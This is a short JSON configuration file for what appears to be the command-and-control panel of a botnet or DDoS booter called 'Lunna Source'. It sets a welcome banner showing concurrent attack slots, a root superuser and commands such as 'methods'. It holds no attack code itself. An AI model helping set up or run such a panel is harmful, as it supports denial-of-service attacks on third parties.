{
	"security_level": 0,
	"cnc_name": "Lunna Source",
	"cnc_motd": "[<&spinner>] uptime: <&cnc.uptime> | Welcome to <&cnc.name> | [<&user.running>/<&user.concurrents>] | @imlumina",
	"superusers": [
		"root"
	],
	"vips": [],
	"commands": [
		"methods",
		"help",
		"banner"
	],
	"blacklist": []
}
